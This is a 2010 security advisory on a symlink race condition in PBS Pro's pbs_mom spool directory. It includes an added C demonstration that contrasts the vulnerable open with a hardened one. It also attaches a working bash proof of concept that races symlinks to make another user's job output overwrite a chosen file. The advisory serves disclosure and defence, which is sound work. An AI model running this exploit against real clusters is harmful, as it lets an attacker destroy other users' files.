
PBS Pro race condition vulnerability

Application:      PBS Pro (part of PBS Works by Altair Engineering)
Affected version: < 10.4
OS:               Linux/UNIX
CVE ID:           pending
Class:            temporary file creation race condition (check-then-create, TOCTOU)
Remote:           no
Threat:           destroy an arbitrarily chosen file of another user
Discovered:       02.02.2010
Discovered by:    Bartlomiej Balcerek

Background:

PBS Pro is commercial software used to perform and manage job scheduling and
execution. It is widely used by supercomputing centers for cluster, grid and
cloud computing.

Vulnerability description:

The PBS Pro execution daemon, pbs_mom, uses the directory /var/spool/pbs/spool
to store temporary files. This directory is world writable. Files in it are
created on behalf of the queue user (with his/her UID and GID) to hold a job's
standard output and standard error streams. Before pbs_mom creates a particular
file, it checks whether a file of that name already exists; if so, the existing
file is deleted and a new one is then opened in write mode. Because the file
name is derived from the job ID and the server hostname (<jobid>.<server>.OU
for standard output, as used in the PoC), an attacker can easily guess the
temporary file name of another user's job and create a symbolic link of that
name between the check and the create, while that user's job is being executed.
The link can point to any file chosen by the attacker that is owned by the
job's owner; that file is then overwritten by the job's standard output or
error stream.
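The check/delete/open sequence just described, shown next to a hardened open, as an added example that is not part of the original advisory and not PBS Pro's own code. The hook called inside the race window stands in for racer.x winning the race at exactly the wrong moment; a scratch directory stands in for /var/spool/pbs/spool, and the spool file names (42.server.OU, victim.txt) are constructed for the demonstration.

```c
/* Added illustration of the advisory's race, not PBS Pro code. The attacker
 * hook, scratch directory and spool file names below are all constructed. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Runs after the existence check and before the open(): the race window. */
typedef void (*race_hook_t)(const char *spool_path, void *ctx);

struct attacker { const char *victim; };    /* file the attacker wants clobbered */

/* What racer.x does in a loop: keep (re)creating spool_path -> victim. */
static void attacker_relinks(const char *spool_path, void *ctx)
{
    const struct attacker *a = ctx;
    unlink(spool_path);
    symlink(a->victim, spool_path);
}

/* Vulnerable pattern described in the advisory. open() has no O_EXCL, so it
 * follows whatever was planted between unlink() and open(), and O_TRUNC then
 * destroys the victim's contents. */
int open_spool_vulnerable(const char *spool_path, race_hook_t hook, void *ctx)
{
    struct stat st;
    if (stat(spool_path, &st) == 0)
        unlink(spool_path);
    if (hook) hook(spool_path, ctx);
    return open(spool_path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: O_CREAT|O_EXCL creates the file atomically and fails with
 * EEXIST on any existing entry, symlink included, instead of following it. A
 * stale entry is unlinked (unlink never follows links) and the open retried a
 * bounded number of times: a persistent attacker can only cause a failure. */
int open_spool_safe(const char *spool_path, race_hook_t hook, void *ctx)
{
    for (int attempt = 0; attempt < 4; attempt++) {
        if (hook) hook(spool_path, ctx);        /* same race window, same attacker */
        int fd = open(spool_path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
        if (fd >= 0)
            return fd;                          /* freshly created by us, not a link */
        if (errno != EEXIST)
            return -1;
        if (unlink(spool_path) != 0 && errno != ENOENT)
            return -1;
    }
    errno = EEXIST;
    return -1;
}

/* Plants dir/victim.txt containing "secret", lets the attacker hook point a
 * constructed spool name at it, then writes "job output" through one of the
 * two opens (as pbs_mom writes a job's stdout). Returns 1 if victim.txt still
 * reads "secret" afterwards, 0 if it was overwritten, -1 on setup error. */
int victim_survives(const char *dir, int use_safe_variant)
{
    char victim[512], spool[512], buf[16] = {0};
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(spool, sizeof spool, "%s/42.server.OU", dir);  /* constructed job id */
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, "secret", 6) != 6)
        return -1;
    close(fd);
    unlink(spool);
    struct attacker a = { victim };
    fd = use_safe_variant ? open_spool_safe(spool, attacker_relinks, &a)
                          : open_spool_vulnerable(spool, attacker_relinks, &a);
    if (fd >= 0) {
        write(fd, "job output\n", 11);
        close(fd);
    }
    unlink(spool);
    fd = open(victim, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    unlink(victim);
    return (n == 6 && memcmp(buf, "secret", 6) == 0) ? 1 : 0;
}

int main(void)
{
    char dir[64];
    snprintf(dir, sizeof dir, "/tmp/pbs-race-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) { perror("mkdir"); return 1; }
    printf("vulnerable open, victim intact: %d\n", victim_survives(dir, 0));
    printf("hardened open, victim intact:   %d\n", victim_survives(dir, 1));
    rmdir(dir);
    return 0;
}
```

With the vulnerable open the victim file ends up containing the job's output; with the hardened open the attacker can only make the open fail with EEXIST. Two caveats: the retry loop is what turns an arbitrary-file overwrite into a denial of service, so the daemon should log the failure rather than silently drop the job's output; and on Linux 3.6 or later with fs.protected_symlinks=1 the kernel refuses to follow a symlink in a world-writable sticky directory unless the follower owns the link or the directory, which would block this attack only if the spool directory carries the sticky bit, something the advisory does not state.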

Exploit:

PoC attached.

Solution:

Upgrade to version >= 10.4

Bug history:

Discovered: 02.02.2010
Vendor contacted: 15.02.2010
Fixed version announced: 08.06.2010
Bug disclosed: 07.07.2010

--
Bartlomiej Balcerek


Attachment: pbs-v10.2.0.93147-PoC.sh

#!/bin/bash
#set -x
# PBS Pro < 10.4 o+w race condition vulnerability Proof Of Concept by Bartlomiej Balcerek - bartol@pwr.wroc.pl
# Must be run on the submitting host; it will create /tmp/pbs_test_by_bartol on the exec host
# with the UID of the owner of the next job submitted to the queue.
echo Compiling racer...
cat << EOF  | gcc -x c -o racer.x -
// repeatedly tries to create the symlink chosen by the attacker (argv[2] -> argv[1])
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char* argv[])
{
 if (argc < 3)  {printf("%s","Need 2 arguments!");exit(1);}
 while (1) symlink(argv[1],argv[2]);
}
EOF
if [ ! -x racer.x ]; then echo "Cannot compile C code, do you have gcc installed ?" ;exit 1; fi
echo Submitting job...
# throwaway job whose only output is the name of the execution host it ran on
jobname=`echo hostname | qsub -j oe -o out.txt`
sleep 2
host=`cat out.txt`
if [ -z "$host" ]; then echo "Cannot determine next execution host, is the queue working ?"; exit 1;fi
rm out.txt
echo Next job will be run on $host
echo Copying racer to $host...
scp ./racer.x $host:/tmp
echo Calculating job id...
# job ids are sequential, so the next job gets our id plus one
jobid=`echo $jobname | cut -d . -f 1`
jobid=$(($jobid+1))
if [ ! $jobid -ge 0 ]; then echo "Cannot determine next job ID!";exit 1;fi
echo Next job ID will be $jobid
hostname=`echo $jobname | cut -d . -f 2`
echo Running racer...submit a job as a different user, then press Ctrl+C after a while.
# the race: keep pointing the next job's stdout spool file at the target path
ssh $host -- \(/tmp/racer.x /tmp/pbs_test_by_bartol /var/spool/pbs/spool/${jobid}.${hostname}.OU \)
ssh $host -- killall racer.x
echo /var/spool/pbs/spool on $host content:
ssh $host -- ls -latr /var/spool/pbs/spool
echo Cleaning up...
ssh $host -- unlink /var/spool/pbs/spool/${jobid}.${hostname}.OU
ssh $host -- ls -latr /var/spool/pbs/spool
ssh $host --  rm -v /tmp/racer.x
rm -v racer.x